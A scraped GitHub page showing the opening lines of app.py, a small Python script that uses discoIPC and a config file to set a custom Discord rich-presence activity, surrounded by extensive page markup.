2.251 0 11-1.5 0V5.372a2.25 2.25 0 111.5 0v1.836A2.492 2.492 0 016 7h4a1 1 0 001-1v-.628A2.25 2.25 0 019.5 3.25zM4.25 12a.75.75 0 100 1.5.75.75 0 000-1.5zM3.5 3.25a.75.75 0 111.5 0 .75.75 0 01-1.5 0z"></path> </svg> <span class="css-truncate-target" data-menu-button>master</span> <span class="dropdown-caret"></span> </summary> <div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg></button> </header> <input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div> <div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div> <div role="tabpanel" id="ref-list-branches" data-filter-placeholder="Filter branches/tags" class="d-flex flex-column flex-auto overflow-auto" tabindex=""> <ref-selector type="branch" data-targets="input-demux.sinks" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " query-endpoint="/agambajwa/discord-custom-activity/refs" cache-key="v0:1601025696.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhbWJhandhL2Rpc2NvcmQtY3VzdG9tLWFjdGl2aXR5" prefetch-on-mouseover > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load branches</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message">Nothing to show</div> </template> <!-- TODO: this max-height is necessary or else the branch list won't scroll. why? --> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list " style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </div> </div> <template data-target="ref-selector.itemTemplate"> <a href="https://github.com/agambajwa/discord-custom-activity/blob/{{ urlEncodedRefName }}/app.py" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template> <footer class="SelectMenu-footer"><a href="/agambajwa/discord-custom-activity/branches">View all branches</a></footer> </ref-selector> </div> <div role="tabpanel" id="tags-menu" data-filter-placeholder="Find a tag" class="d-flex flex-column flex-auto overflow-auto" tabindex="" hidden> <ref-selector type="tag" data-action=" input-entered:ref-selector#inputEntered tab-selected:ref-selector#tabSelected focus-list:ref-selector#focusFirstListMember " data-targets="input-demux.sinks" query-endpoint="/agambajwa/discord-custom-activity/refs" cache-key="v0:1601025696.0" current-committish="bWFzdGVy" default-branch="bWFzdGVy" name-with-owner="YWdhbWJhandhL2Rpc2NvcmQtY3VzdG9tLWFjdGl2aXR5" > <template data-target="ref-selector.fetchFailedTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Could not load tags</div> </template> <template data-target="ref-selector.noMatchTemplate"> <div class="SelectMenu-message" data-index="{{ index }}">Nothing to show</div> </template> <template data-target="ref-selector.itemTemplate"> <a href="https://github.com/agambajwa/discord-custom-activity/blob/{{ urlEncodedRefName }}/app.py" class="SelectMenu-item" role="menuitemradio" rel="nofollow" aria-checked="{{ isCurrent }}" data-index="{{ index }}"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-1 css-truncate css-truncate-overflow {{ isFilteringClass }}">{{ refName }}</span> <span hidden="{{ isNotDefault }}" class="Label Label--secondary flex-self-start">default</span> </a> </template> <div data-target="ref-selector.listContainer" role="menu" class="SelectMenu-list" style="max-height: 330px" data-pjax="#repo-content-pjax-container"> <div class="SelectMenu-loading pt-3 pb-0" aria-label="Menu is loading"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </div> </div> <footer class="SelectMenu-footer"><a href="/agambajwa/discord-custom-activity/tags">View all tags</a></footer> </ref-selector> </div> </tab-container> </input-demux> </div> </div> </details> </div> <h2 id="blob-path" class="breadcrumb flex-auto flex-self-center min-width-0 text-normal mx-2 width-full width-md-auto flex-order-1 flex-md-order-none mt-3 mt-md-0"> <span class="js-repo-root text-bold"><span class="js-path-segment d-inline-block wb-break-all"><a data-pjax="#repo-content-pjax-container" href="/agambajwa/discord-custom-activity"><span>discord-custom-activity</span></a></span></span><span class="separator">/</span><strong class="final-path">app.py</strong> <span class="separator">/</span><details class="details-reset details-overlay d-inline" id="jumpto-symbol-select-menu"> <summary aria-haspopup="true" data-hotkey="r" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.click_on_blob_definitions&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;click_on_blob_definitions&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="8ab7943d9e2ebd68838936d01c014cb5492553c6b3f67f3ecef74fb8344b8b58" role="button" data-view-component="true" class="Link--secondary css-truncate btn-link"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code"> <path fill-rule="evenodd" d="M4.72 3.22a.75.75 0 011.06 1.06L2.06 8l3.72 3.72a.75.75 0 11-1.06 1.06L.47 8.53a.75.75 0 010-1.06l4.25-4.25zm6.56 0a.75.75 0 10-1.06 1.06L13.94 8l-3.72 3.72a.75.75 0 101.06 1.06l4.25-4.25a.75.75 0 000-1.06l-4.25-4.25z"></path> </svg> <span data-menu-button>Jump to</span> <span class="dropdown-caret"></span> </summary> <details-menu class="SelectMenu SelectMenu--hasFilter" role="menu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span class="SelectMenu-title">Code definitions</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="jumpto-symbol-select-menu"> <svg aria-label="Close menu" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path> </svg> </button> </header> <div class="SelectMenu-filter"> <input class="SelectMenu-input form-control js-filterable-field" id="jumpto-symbols-filter-field" type="text" autocomplete="off" spellcheck="false" autofocus placeholder="Filter definitions" aria-label="Filter definitions"> </div> <div class="SelectMenu-list"> <div data-filterable-for="jumpto-symbols-filter-field" data-filterable-type="substring"> <a class="SelectMenu-item d-flex flex-justify-between css-truncate" role="menuitemradio" aria-checked="false" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.navigate_to_blob_definition&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;navigate_to_blob_definition&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0cf0b78350c5c2e7878d0e0e8a2344d9d2ea181f5103bfbac5345d842937be4d" href="/agambajwa/discord-custom-activity/blob/master/app.py#L22"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-auto css-truncate-target" data-menu-button-text>main</span> <span class="flex-auto d-flex flex-justify-end">Function</span> </a> <a class="SelectMenu-item d-flex flex-justify-between css-truncate" role="menuitemradio" aria-checked="false" rel="nofollow" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.navigate_to_blob_definition&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;navigate_to_blob_definition&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0cf0b78350c5c2e7878d0e0e8a2344d9d2ea181f5103bfbac5345d842937be4d" href="/agambajwa/discord-custom-activity/blob/master/app.py#L40"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check SelectMenu-icon SelectMenu-icon--check"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> <span class="flex-auto css-truncate-target" data-menu-button-text>set_activity</span> <span class="flex-auto d-flex flex-justify-end">Function</span> </a> </div> </div> <footer class="SelectMenu-footer"> <div class="d-flex flex-justify-between"> Code navigation index up-to-date <svg class="octicon octicon-dot-fill text-green" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M8 4a4 4 0 100 8 4 4 0 000-8z"></path></svg> </div> </footer> </div> </details-menu> </details> </h2> <a href="/agambajwa/discord-custom-activity/find/master" class="js-pjax-capture-input btn mr-2 d-none d-md-block" data-pjax data-hotkey="t"> Go to file </a> <details id="blob-more-options-details" data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true" class="btn"> <svg aria-label="More options" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <div data-view-component="true"> <ul class="dropdown-menu dropdown-menu-sw"> <li class="d-block d-md-none"> <a class="dropdown-item d-flex flex-items-baseline" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FIND_FILE_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="c1741d2af11cddb7e7412f38207326d10be1eee4009dab1c2fcfffcfe5bfe980" data-ga-click="Repository, find file, location:repo overview" data-hotkey="t" data-pjax="true" href="/agambajwa/discord-custom-activity/find/master"> <span class="flex-auto">Go to file</span> <span class="text-small color-text-secondary" aria-hidden="true">T</span> </a> </li> <li data-toggle-for="blob-more-options-details"> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Go to line</span> <span class="text-small color-text-secondary" aria-hidden="true">L</span> </span> </button> </li> <li data-toggle-for="blob-more-options-details"> <button data-toggle-for="jumpto-symbol-select-menu" type="button" data-view-component="true" class="dropdown-item btn-link"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Go to definition</span> <span class="text-small color-text-secondary" aria-hidden="true">R</span> </span> </button> </li> <li class="dropdown-divider" role="none"></li> <li> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="app.py" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path </clipboard-copy> </li> <li> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/agambajwa/discord-custom-activity/blob/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py" data-view-component="true" class="dropdown-item cursor-pointer"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Copy permalink</span> </span> </clipboard-copy> </li> </ul> </div> </details> </div> <div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/agambajwa/discord-custom-activity/contributors/master/app.py" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2">&nbsp;</div> </div> <div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1">&nbsp;</div> <span class="color-text-danger h6 loader-error">Cannot retrieve contributors at this time</span> </div> </include-fragment> </div> <div data-target="readme-toc.content" class="Box mt-3 position-relative "> <div class="Box-header py-2 pr-2 d-flex flex-shrink-0 flex-md-row flex-items-center" > <div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1"> 46 lines (38 sloc) <span class="file-info-divider"></span> 1015 Bytes </div> <div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <a href="/agambajwa/discord-custom-activity/raw/master/app.py" id="raw-url" role="button" data-view-component="true" class="btn-sm btn BtnGroup-item"> Raw </a> <a href="/agambajwa/discord-custom-activity/blame/master/app.py" data-hotkey="b" role="button" data-view-component="true" class="js-update-url-with-hash btn-sm btn BtnGroup-item"> Blame </a> </div> <div> <a class="btn-octicon tooltipped tooltipped-nw js-remove-unless-platform" data-platforms="windows,mac" href="https://desktop.github.com" aria-label="Open this file in GitHub Desktop" data-ga-click="Repository, open with desktop"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path fill-rule="evenodd" d="M1.75 2.5h12.5a.25.25 0 01.25.25v7.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25v-7.5a.25.25 0 01.25-.25zM14.25 1H1.75A1.75 1.75 0 000 2.75v7.5C0 11.216.784 12 1.75 12h3.727c-.1 1.041-.52 1.872-1.292 2.757A.75.75 0 004.75 16h6.5a.75.75 0 00.565-1.243c-.772-.885-1.193-1.716-1.292-2.757h3.727A1.75 1.75 0 0016 10.25v-7.5A1.75 1.75 0 0014.25 1zM9.018 12H6.982a5.72 5.72 0 01-.765 2.5h3.566a5.72 5.72 0 01-.765-2.5z"></path> </svg> </a> <remote-clipboard-copy class="d-inline-block btn-octicon" style="height: 26px" data-src="/agambajwa/discord-custom-activity/raw/master/app.py" data-action="click:remote-clipboard-copy#remoteCopy"> <span data-target="remote-clipboard-copy.idle"> <span class="tooltipped tooltipped-nw cursor-pointer" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;COPY_RAW_CONTENTS_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="e53a27ab14298c3efe29c78eae6edddde764a5cc9397f6bfea195fd867c5ff40" aria-label="Copy raw contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path> </svg> </span></span> <span data-target="remote-clipboard-copy.fetching" hidden="hidden"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </span> <span data-target="remote-clipboard-copy.success" hidden="hidden"> <span class="tooltipped tooltipped-nw" aria-label="Copied!"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-text-success"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> </span> <span data-target="remote-clipboard-copy.error" hidden="hidden"> <span class="tooltipped tooltipped-nw" aria-label="Something went wrong. Try again."> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-text-warning"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> </span> </span> </remote-clipboard-copy> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="inline-form js-update-url-with-hash" action="/agambajwa/discord-custom-activity/edit/master/app.py" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="JNSPx4+edOJ4WuJlWAfZuhILKwlrsffHdo0azFAoNPLBRZkHQ1RfN4vEIE09btacItBs0wbIq0vJGRVkZ2ZA6g==" /> <button class="btn-octicon tooltipped tooltipped-nw" type="submit" aria-label="Fork this project and edit the file" data-hotkey="e" data-disable-with> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path fill-rule="evenodd" d="M11.013 1.427a1.75 1.75 0 012.474 0l1.086 1.086a1.75 1.75 0 010 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 01-.927-.928l.929-3.25a1.75 1.75 0 01.445-.758l8.61-8.61zm1.414 1.06a.25.25 0 00-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 000-.354l-1.086-1.086zM11.189 6.25L9.75 4.81l-6.286 6.287a.25.25 0 00-.064.108l-.558 1.953 1.953-.558a.249.249 0 00.108-.064l6.286-6.286z"></path> </svg> </button> </form> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="inline-form" action="/agambajwa/discord-custom-activity/delete/master/app.py" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="OibpDzLUKYX9Osb3BVKMD8HPENt+M/zePb/fqBW6lq6ti32WNXO3wezy3hLuFD24emiY+YaU6pw5iBs9SBCWqg==" /> <button class="btn-octicon btn-octicon-danger tooltipped tooltipped-nw" type="submit" aria-label="Fork this project and delete the file" data-disable-with> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path fill-rule="evenodd" d="M6.5 1.75a.25.25 0 01.25-.25h2.5a.25.25 0 01.25.25V3h-3V1.75zm4.5 0V3h2.25a.75.75 0 010 1.5H2.75a.75.75 0 010-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75zM4.496 6.675a.75.75 0 10-1.492.15l.66 6.6A1.75 1.75 0 005.405 15h5.19c.9 0 1.652-.681 1.741-1.576l.66-6.6a.75.75 0 00-1.492-.149l-.66 6.6a.25.25 0 01-.249.225h-5.19a.25.25 0 01-.249-.225l-.66-6.6z"></path> </svg> </button> </form> </div> </div> <div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="btn-octicon" aria-haspopup="true" aria-label="possible actions"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <ul class="dropdown-menu dropdown-menu-sw" style="width: 175px"> <li> <a class="dropdown-item tooltipped tooltipped-nw js-remove-unless-platform" data-platforms="windows,mac" href="https://desktop.github.com" data-ga-click="Repository, open with desktop"> Open with Desktop </a> </li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/raw/master/app.py"> View raw </a> </li> <li> <remote-clipboard-copy class="dropdown-item" data-src="/agambajwa/discord-custom-activity/raw/master/app.py" data-action="click:remote-clipboard-copy#remoteCopy"> <span data-target="remote-clipboard-copy.idle"> <span class="cursor-pointer" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;COPY_RAW_CONTENTS_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="e53a27ab14298c3efe29c78eae6edddde764a5cc9397f6bfea195fd867c5ff40"> Copy raw contents </span></span> <span data-target="remote-clipboard-copy.fetching" hidden="hidden"> Copy raw contents <span class="d-inline-block position-relative" style="top: 3px"> <svg aria-label="fetching contents…" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </span> </span> <span data-target="remote-clipboard-copy.success" hidden="hidden"> Copy raw contents <svg aria-label="Copied!" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-text-success"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <span data-target="remote-clipboard-copy.error" hidden="hidden"> Copy raw contents <svg aria-label="Something went wrong. Try again." role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-text-warning"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> </span> </remote-clipboard-copy> </li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/blame/master/app.py"> View blame </a> </li> <li class="dropdown-divider" role="none"></li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/edit/master/app.py">Edit file</a> </li> <li> <a class="dropdown-item menu-item-danger" href="/agambajwa/discord-custom-activity/delete/master/app.py">Delete file</a> </li> </ul> </details> </div> </div> <div itemprop="text" class="Box-body p-0 blob-wrapper data type-python gist-border-0"> <table class="highlight tab-size js-file-line-container" data-tab-size="8" data-paste-markdown-skip> <tr> <td id="L1" class="blob-num js-line-number" data-line-number="1"></td> <td id="LC1" class="blob-code blob-code-inner js-file-line"><span class=pl-k>from</span> <span class=pl-s1>discoIPC</span> <span class=pl-k>import</span> <span class=pl-s1>ipc</span></td> </tr> <tr> <td id="L2" class="blob-num js-line-number" data-line-number="2"></td> <td id="LC2" class="blob-code blob-code-inner js-file-line"><span class=pl-k>import</span> <span class=pl-s1>configparser</span></td> </tr> <tr> <td id="L3" class="blob-num js-line-number" data-line-number="3"></td> <td id="LC3" class="blob-code blob-code-inner js-file-line"><span class=pl-k>import</span> <span class=pl-s1>time</span></td> </tr> <tr> <td id="L4" class="blob-num js-line-number" data-line-number="4"></td> <td id="LC4" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L5" class="blob-num js-line-number" data-line-number="5"></td> <td id="LC5" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>config</span> <span class=pl-c1>=</span> <span class=pl-s1>configparser</span>.<span class=pl-v>ConfigParser</span>()</td> </tr> <tr> <td id="L6" class="blob-num js-line-number" data-line-number="6"></td> <td id="LC6" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>config</span>.<span class=pl-en>read</span>(<span class=pl-s>&#39;config.ini&#39;</span>)</td> </tr> <tr> <td id="L7" class="blob-num js-line-number" data-line-number="7"></td> <td id="LC7" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L8" class="blob-num js-line-number" data-line-number="8"></td> <td id="LC8" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>base_activity</span> <span class=pl-c1>=</span> {</td> </tr> <tr> <td id="L9" class="blob-num js-line-number" data-line-number="9"></td> <td id="LC9" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;details&#39;</span>: <span class=pl-s>&#39;Custom details&#39;</span>,</td> </tr> <tr> <td id="L10" class="blob-num js-line-number" data-line-number="10"></td> <td id="LC10" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;state&#39;</span> : <span class=pl-s>&#39;Custom state&#39;</span>,</td> </tr> <tr> <td id="L11" class="blob-num js-line-number" data-line-number="11"></td> <td id="LC11" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;assets&#39;</span>: {</td> </tr> <tr> <td id="L12" class="blob-num js-line-number" data-line-number="12"></td> <td id="LC12" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;large_image&#39;</span>: <span class=pl-s>&#39;image_name&#39;</span>,</td> </tr> <tr> <td id="L13" class="blob-num js-line-number" data-line-number="13"></td> <td id="LC13" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;large_text&#39;</span>: <span class=pl-s>&#39;Image text&#39;</span>,</td> </tr> <tr> <td id="L14" class="blob-num js-line-number" data-line-number="14"></td> <td id="LC14" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;small_image&#39;</span>: <span class=pl-s>&#39;small_image_name&#39;</span>,</td> </tr> <tr> <td id="L15" class="blob-num js-line-number" data-line-number="15"></td> <td id="LC15" class="blob-code blob-code-inner js-file-line"> <span 